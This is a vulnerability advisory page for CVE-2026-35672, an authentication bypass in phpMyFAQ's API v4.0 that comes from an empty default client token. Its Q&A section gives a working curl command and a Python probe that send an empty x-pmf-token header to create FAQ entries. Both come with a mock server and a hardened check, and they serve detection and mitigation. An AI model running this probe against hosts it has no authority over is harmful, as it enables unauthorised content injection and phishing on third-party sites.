CVE-2026-35672
Authentication Bypass in phpMyFAQ API v4.0

Publication date: 2026-05-28

Last updated on: 2026-05-28

Assigner: VulnCheck

Description
phpMyFAQ before 4.1.3 contains an authentication bypass vulnerability in API v4.0 where the default empty api.apiClientToken allows unauthenticated users to create and modify FAQ entries. Attackers can send an empty x-pmf-token header to bypass token validation and inject malicious content via POST endpoints /api/v4.0/faq/create, /api/v4.0/category, and /api/v4.0/question.
Affected Vendors & Products
Vendor Product Version / Range
phpmyfaq phpmyfaq all versions before 4.1.3 (4.1.3 itself is not affected)
CWE ID Description
CWE-1188 The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-35672 is an authentication bypass in phpMyFAQ versions before 4.1.3. The installer leaves api.apiClientToken empty by default, and the API v4.0 token check accepts a request whose x-pmf-token header is also empty, so an unauthenticated client passes validation on any installation where the administrator never set a token.

The flaw is a faulty comparison in the API's token check (reported as the hasValidToken() method): with no token configured, the empty configured value compares equal to an empty presented value and the request is treated as authenticated. As a result, attackers can create and modify FAQ entries, categories, and questions through the REST API without any credentials.


How can this vulnerability impact me?

Exploitation allows attackers to inject arbitrary content into the FAQ system by creating or modifying entries, categories, and questions without authentication. Because FAQ pages are trusted, indexed content, the consequences include:

  • Content injection (attacker-controlled text and links published under your site)
  • Phishing attacks (malicious links placed in content visitors trust)
  • SEO spam
  • Damage to the reputation of the affected site or organization

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by checking whether your phpMyFAQ installation is older than 4.1.3 and whether api.apiClientToken is still empty in the configuration. An active test sends a POST to one of the affected endpoints with an x-pmf-token header whose value is empty and checks whether the request is accepted.

A practical detection method is to send HTTP POST requests to the vulnerable API endpoints such as /api/v4.0/faq/create, /api/v4.0/category, or /api/v4.0/question with an empty x-pmf-token header and observe whether the request is accepted without authentication.

  • Use curl to test the bypass. Note that curl treats -H "x-pmf-token:" (colon, no value) as an instruction to drop the header rather than send it empty, so terminate the header name with a semicolon to send it with an empty value:
  • curl -X POST https://your-phpmyfaq-domain/api/v4.0/faq/create -H 'x-pmf-token;' -H 'Content-Type: application/json' -d '{"question":"test","answer":"test"}' -v
  • A 401 or 403 response means the empty token was rejected. A 2xx response that creates the entry means the vulnerability is present. Because a successful probe writes a real FAQ entry, run it against a staging copy or remove the test entry afterwards.
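The following is an added example written for this page, not phpMyFAQ's own code. It models the check described in the explanation above (an installer default of "" compared directly against the x-pmf-token header) next to a hardened version, and wraps the detection step above in a probe that sends a genuinely empty-valued header. A local mock server built on the same two checks lets the probe run offline. The vulnerable function reproduces the pattern the advisory describes, not the project's actual hasValidToken() source, and the request body field names are placeholders, since the advisory does not publish the request schema.

```python
"""Worked model of CVE-2026-35672: the empty-default token check, a probe that
sends an empty x-pmf-token header, and a local mock target for offline runs.

Added for this page; none of this is phpMyFAQ's own code. The vulnerable
check reproduces the pattern the advisory describes (installer default ""
compared directly against the header), not the project's real source, and
the request body field names are placeholders.
"""
import hmac
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional

# Constructed stand-in for the shipped configuration: the token is empty
# until an administrator sets it (CWE-1188, insecure default).
DEFAULT_CONFIG = {"api.apiClientToken": ""}
PROBE_PATH = "/api/v4.0/faq/create"
# Constructed payload with placeholder field names. A real run against a
# vulnerable host creates an entry, so only target a copy you may modify.
PROBE_BODY = {"question": "CVE-2026-35672 probe", "answer": "remove me"}


def has_valid_token_vulnerable(config: dict, presented: Optional[str]) -> bool:
    """Flawed pattern: "" == "" is True, so an empty header passes whenever
    the administrator never changed the default."""
    configured = config.get("api.apiClientToken", "")
    return (presented or "") == configured


def has_valid_token_fixed(config: dict, presented: Optional[str]) -> bool:
    """Hardened pattern: an unset token closes the API instead of opening it,
    an empty or missing header is rejected, and the compare is constant-time."""
    configured = config.get("api.apiClientToken", "")
    if not configured or not presented:
        return False
    return hmac.compare_digest(presented.encode(), configured.encode())


def probe(base_url: str, timeout: float = 5.0) -> str:
    """POST to the create endpoint with an empty-valued x-pmf-token header and
    classify the answer: 'vulnerable', 'rejected' or 'inconclusive:<status>'."""
    req = urllib.request.Request(
        base_url.rstrip("/") + PROBE_PATH,
        data=json.dumps(PROBE_BODY).encode(),
        method="POST",
    )
    req.add_header("Content-Type", "application/json")
    req.add_header("x-pmf-token", "")  # header is sent, value is empty
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as exc:
        status = exc.code
    except urllib.error.URLError as exc:
        return f"inconclusive:{exc.reason}"
    if status in (200, 201):
        return "vulnerable"
    if status in (401, 403):
        return "rejected"
    return f"inconclusive:{status}"


def make_mock_server(config: dict, hardened: bool):
    """Minimal local stand-in for the API that authenticates with one of the
    two checks above. Returns (server, base_url); call server.shutdown()
    when done."""
    check = has_valid_token_fixed if hardened else has_valid_token_vulnerable

    class Handler(BaseHTTPRequestHandler):
        def do_POST(self):
            self.rfile.read(int(self.headers.get("Content-Length", 0)))
            presented = self.headers.get("x-pmf-token")
            if presented is not None:
                presented = presented.strip()
            self.send_response(201 if check(config, presented) else 401)
            self.end_headers()

        def log_message(self, *args):  # keep the demo quiet
            pass

    server = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    for hardened in (False, True):
        server, url = make_mock_server(DEFAULT_CONFIG, hardened)
        print("hardened" if hardened else "vulnerable", "check:", probe(url))
        server.shutdown()
        server.server_close()
```

Against the vulnerable mock the probe reports "vulnerable" and against the hardened one "rejected"; pointed at a real host it performs the same write as the curl command above, so the same staging-only caveat applies.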

What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade phpMyFAQ to version 4.1.3 or later, where this authentication bypass vulnerability has been patched.

If upgrading immediately is not possible, set api.apiClientToken to a long, randomly generated, non-empty value in the configuration so that an empty x-pmf-token header no longer matches the configured token.

Additionally, restrict access to the API endpoints by network controls or firewall rules to limit exposure until the patch is applied.

